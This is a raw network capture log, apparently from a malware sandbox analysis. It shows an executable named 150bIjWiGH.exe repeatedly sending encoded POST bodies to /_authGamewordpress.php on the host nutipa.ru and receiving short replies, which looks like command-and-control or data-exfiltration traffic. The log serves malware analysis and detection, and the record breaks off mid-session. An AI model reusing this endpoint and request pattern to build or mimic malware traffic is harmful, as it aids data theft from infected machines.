                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rS27k3d%2Bj3XYzR%2FuCUjzyH8vB7NhaQmE4VAOpIHqmQPt3qlFedOIhNdqNaE0Dz0JqebsZSJ9wc%2BRS%2FO2hmyXejpYIhjGucAmEvCels0sYHetXnE5Co54bONoJ0Q%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a32aec83354-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3342&min_rtt=2027&rtt_var=3392&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=1740&delivery_rate=116297&cwnd=113&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 3a 03 35 14 21 0a 23 2d 20 50 2d 02 21 53 2b 20 05 1b 30 32 29 59 24 01 37 59 3d 04 3c 0d 24 29 07 5b 37 0c 25 57 3f 37 32 05 26 1c 21 51 03 11 21 00 26 2d 38 12 2b 3a 28 17 25 0f 0d 16 26 3e 20 14 3c 01 39 0f 30 5e 2b 53 34 3e 2c 1a 2e 29 3f 05 28 14 01 5d 39 00 36 54 34 0c 2e 53 0c 17 25 5d 28 07 0f 03 23 54 36 09 27 02 28 0e 20 17 32 54 2a 20 3c 50 24 23 0a 0a 26 2e 38 1b 36 09 29 57 24 3a 29 02 34 22 3e 55 2a 22 25 5c 20 05 2e 52 03 34 5d 54 0d 0a
                                                            Data Ascii: 98:5!#- P-!S+ 02)Y$7Y=<$)[7%W?72&!Q!&-8+:(%&> <90^+S4>,.)?(]96T4.S%](#T6'( 2T* <P$#&.86)W$:)4">U*"%\ .R4]T
                                                            Dec 15, 2024 19:36:33.726315022 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            6 | 192.168.2.4 | 49750 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:36:32.304044962 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:36:32.654339075 CET | 2536 | OUT | Data Raw: 55 57 43 58 5f 58 5d 52 5d 5a 56 51 50 5b 57 5b 55 50 5e 42 5a 52 5b 58 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UWCX_X]R]ZVQP[W[UP^BZR[X\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$_([>^>*Y5?6C(=7?'--1>%T*#^']=#5T,.F'#P +
                                                            Dec 15, 2024 19:36:33.391849041 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:33.632921934 CET | 793 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:33 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D9GEBQc5dAl0W6h2ISauYwtbbPJWyeSrZoGobzY6MkQeH4vaSVQ%2F4DeuUL%2FxcTsIu5FYEjUKUqvmXJEVd3lZ1ZZqiVwuPRwlfeiabrH5tGFUtFgEdAu5iZ0xDaw%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a33bb574231-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7098&min_rtt=1627&rtt_var=11552&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=32160&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            7 | 192.168.2.4 | 49752 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:36:33.890738010 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            8 | 192.168.2.4 | 49753 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:36:34.141935110 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:36:34.498130083 CET | 2536 | OUT | Data Raw: 50 5e 43 5e 5a 5b 5d 54 5d 5a 56 51 50 59 57 52 55 52 5e 46 5a 54 5b 5c 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: P^C^Z[]T]ZVQPYWRUR^FZT[\\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'+->X)76=+='\#?(X1-1U>0'.?-+.F'#P #
                                                            Dec 15, 2024 19:36:35.236308098 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:35.782630920 CET | 801 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:35 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FDgE7658LVhF4cPAEE%2Bi0yQHtJwtek1QltKoB2WAqNpLzW%2F%2FsyYt7%2BRxYqROcq5eMgPSJfBNbtVQk1%2Fpei0UppOHczF6VkNocz9k1OC5aNBQTb6Po00W7pmxsUI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a3f4ae97281-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7511&min_rtt=2099&rtt_var=11612&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=32158&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            9 | 192.168.2.4 | 49754 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:36:36.020024061 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:36.372960091 CET | 2536 | OUT | Data Raw: 50 5f 43 58 5a 58 5d 52 5d 5a 56 51 50 5c 57 54 55 57 5e 41 5a 55 5b 58 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: P_CXZX]R]ZVQP\WTUW^AZU[X\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$_+[2^=9'5Z&B+[+\#?3%=%.Q)0'.^( )W/;.F'#P 7
                                                            Dec 15, 2024 19:36:37.144916058 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:37.383358002 CET | 799 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V11o%2FaIA8wFOcdLkJzxhwIq34glNCyhwOBXYdQbbcpisNgE6qA%2FhrxkkN%2BstPo7qXu%2B4ITLMytptDpppLD%2F2arJ1FkPKM85MCP378gUm66I0RrHge2asZoEuMk8%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a4b2a3af5f6-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7270&min_rtt=1805&rtt_var=11608&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=32066&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            10 | 192.168.2.4 | 49755 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:36:37.635854959 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:37.982553959 CET | 2536 | OUT | Data Raw: 50 51 43 51 5f 5f 5d 54 5d 5a 56 51 50 5e 57 5a 55 56 5e 40 5a 51 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PQCQ__]T]ZVQP^WZUV^@ZQ[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$]?=*:?6,-(+Z!/81=-1>39<39S/.F'#P ?
                                                            Dec 15, 2024 19:36:38.727225065 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:38.992369890 CET | 796 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SPYRq7mFmOWMEQU5S%2BimWdmsqk%2FQWAguFykoPvG%2BBKxzc2DVohYcCLGbozg3xRZWhREtZBvoVdzHQisGWXLS2OV9hbhA75jDfVO8lyTgr72%2B7VPk35dGLoj1Uxs%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a551aa97c69-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4555&min_rtt=1923&rtt_var=5987&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=63516&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            11 | 192.168.2.4 | 49756 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:36:38.860690117 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:39.216974974 CET | 1420 | OUT | Data Raw: 55 55 43 59 5f 56 58 57 5d 5a 56 51 50 50 57 52 55 57 5e 46 5a 50 5b 59 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UUCY_VXW]ZVQPPWRUW^FZP[Y\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'(-9*9+]#?>A+=/Z!?[%X1>U*0?^'.6]+9-+.F'#P
                                                            Dec 15, 2024 19:36:40.002067089 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:40.242865086 CET | 940 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:40 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R0336bVLjotJI%2BjnKqPqrDGG4YlfxSWydw5xu9fHBuOsIEd23dYjNFNzRfS4YrD7aXwlaPoeFQctBLEqOlfzO55RQC6MiRVVbfS4OggKgzyolimjds4MZcRZ0y0%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a5cdcd89e08-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7541&min_rtt=2000&rtt_var=11832&sent=5&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=1716&delivery_rate=31512&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 39 5a 35 39 22 1f 23 00 0d 0d 2e 3c 32 0f 28 1e 38 40 24 22 2d 5e 33 5e 3f 15 3d 2d 3b 1c 25 39 36 06 22 31 31 1c 3f 27 25 12 26 0c 21 51 03 11 22 12 25 58 3c 5a 3e 00 2f 03 25 21 23 5e 31 3d 38 5f 2a 28 21 0c 27 01 23 54 23 10 3b 0f 2e 14 0a 5b 2b 03 30 02 2f 2e 00 13 37 0c 2e 53 0c 17 26 04 3f 07 3a 58 21 31 3a 0e 30 3c 1a 0e 21 29 3e 53 3f 33 2b 0e 24 23 23 1f 33 2e 24 1a 22 33 3d 53 26 03 3d 06 23 32 21 09 3d 22 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 989Z59"#.<2(8@$"-^3^?=-;%96"11?'%&!Q"%X<Z>/%!#^1=8_*(!'#T#;.[+0/.7.S&?:X!1:0<!)>S?3+$##3.$"3=S&=#2!="%\ .R4]T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            12 | 192.168.2.4 | 49757 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:36:39.250420094 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:39.607448101 CET | 2536 | OUT | Data Raw: 50 56 46 5c 5f 57 5d 56 5d 5a 56 51 50 51 57 57 55 5d 5e 42 5a 51 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PVF\_W]V]ZVQPQWWU]^BZQ[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$+:Y=*#"*?'X#Y<2._2")83(38.F'#P
                                                            Dec 15, 2024 19:36:40.352747917 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:40.602191925 CET | 792 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:40 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o4oHDhqyl94b9UMup59x8n%2FHPVBWJfJpLK5ImsB56hBvPG9zp6hdjSIybfcL5KxtwcBAs0rO0aXvW5J0PcgoUOgU4NV9SLpPP7DARvqmXXX0dFNGo1MOpW%2F3CGU%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a5f4bebc47c-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4196&min_rtt=1611&rtt_var=5774&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=65494&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            13 | 192.168.2.4 | 49758 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:36:40.891896009 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:41.247925043 CET | 2536 | OUT | Data Raw: 55 55 43 59 5a 5c 58 56 5d 5a 56 51 50 59 57 54 55 54 5e 48 5a 5f 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UUCYZ\XV]ZVQPYWTUT^HZ_[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'+=9):Y6,9?[8!<([2>Y&X-=06^<U%U8.F'#P #
                                                            Dec 15, 2024 19:36:41.979324102 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:42.223402977 CET | 798 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p1S6aVvjfXEfEv3WKxRcgi%2FFITreFKHJpzke56na3bKYrE%2FYll1CUxSQZ58ySY3%2Ftr8GMLP%2F7vlgW%2BLdwGWwkK66pWA3c7NOgu9JHDQIPfalh8W0Tb8ZLPuTYUk%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a696c62425b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4063&min_rtt=1650&rtt_var=5445&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=69663&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            14 | 192.168.2.4 | 49759 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:36:42.481076002 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:42.826088905 CET  2536               OUT        POST request body
                                                            Dec 15, 2024 19:36:43.572362900 CET  25                 IN         HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:43.808235884 CET  798                IN         HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qCaK8XOFPpXYB2EFDwOrD3b%2FS1lczofqYJolb%2BqvupOdATtkIRNGw%2FDMoWoF0YALZ234eNV9NWc2ufDnnF7WkwUavGu%2FJf1pwMf7TurIFLJ%2FumuVTPFWpmPjsbk%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a735b3343a3-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4390&min_rtt=1629&rtt_var=6134&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=61548&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            15          192.168.2.4  49760        104.21.64.130   80                7956  C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Dec 15, 2024 19:36:44.056881905 CET  296                OUT        POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:36:44.404248953 CET  2536               OUT        POST request body
                                                            Dec 15, 2024 19:36:45.143028975 CET  25                 IN         HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:36:45.387346983 CET  797                IN         HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:36:45 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CJ1TEmc2FIK9YiRO1JN3lOK1ewihy9uS2sKcrMgPe%2FJ9oM89Av%2FnaWBxk%2B6FyVwg4FjNU7rQ8iw1SStFH9xRq5egm57izcTdfXFh%2BIgBMFgkuScID6W4S72ijXA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288a7d3c7b8c96-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3654&min_rtt=2230&rtt_var=3684&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=107179&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            16          192.168.2.4  49761        104.21.64.130   80                7956  C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Dec 15, 2024 19:36:45.369661093 CET  296                OUT        POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
